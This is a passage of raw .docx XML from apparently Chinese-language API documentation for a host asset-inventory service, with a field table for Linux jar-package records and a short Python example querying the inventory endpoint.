            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759B0269" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56B85D78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E6B103" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="048BFE6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02E67A11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE57DCB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2517C79E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C51ADFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0D17D573" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09AC74B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38055CA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C04EE8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C9FE4C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76482F9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="666450A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3175FEA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16B69E5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76E625E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0FE26AFF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A574BB6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12006F72" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35C0123A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2487FC2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0AF483D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C2F7CE5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44D7493D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1221804E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A43ED54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1FE89B2D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6171834D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AC6F86A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E34D360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B9DCDAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F8147B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3995D6B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="445A8A90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6082819D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09B352EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FC0FE85" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DA8BD06" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D6879F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C1B5943" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603C2E16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="385D3715" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="29F1302D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24D1EB91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2446DC84" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D866854" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B1B83D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B16EEED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D8F32E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42F619EE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="764DA0B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>包名</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="669DCE80" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="099DB696" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0272460D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F624FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21F59D3C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6F9B6C03" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F07FE2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00AF2A51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AF725B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566EB17A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6BFAFFF7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="388B8F00" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CF9B9A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>布尔</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="735446E2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="033038AD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否可执行</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F09F4C1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="173A8CA3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C3214F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="685B3A12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ECFA56D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>绝对路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BFF65C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>代码示例(python)：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-jar安装包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEF8E8F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jar_pkg_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "http://%s:%s/external/api/assets/jar_pkg/linux?name=ibmsaslprovider.jar&amp;executable=false&amp;version=8.0&amp;type=2&amp;path=/opt/IBM/WebSphere/AppServer/java/jre/lib/ext/ibmsaslprovider.jar" % (host, port)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    data = {'name': 'ibmsaslprovider.jar', 'executable': 'false', 'version': '8.0', 'type': 2, 'path': '/opt/IBM/WebSphere/AppServer/java/jre/lib/ext/ibmsaslprovider.jar'}</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    res = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>send_request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("GET", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    print "result: ",res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443CB793" w14:textId="0DD1CEB1" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>对于签名的部分，有疑问可以参考</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:instrText>HYPERLINK \l "身份认证" \h</w:instrText>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:t>身份认证</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:hyperlink w:anchor="请求签名">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>请求签名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>，对于完整的模拟请求参考</w:t>
      </w:r>
      <w:hyperlink w:anchor="启动项信息查询结果">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af6"/>
          </w:rPr>
          <w:t>启动项信息查询结果</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>的windows代码示例(python)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B6202" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc115166149"/>
      <w:bookmarkStart w:id="150" w:name="jar包信息扫描"/>
      <w:bookmarkEnd w:id="148"/>
      <w:r>
        <w:t>jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>扫描</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
    </w:p>
    <w:p w14:paraId="14CBDE3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>该接口用于请求jar</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>包信息</w:t>
      </w:r>
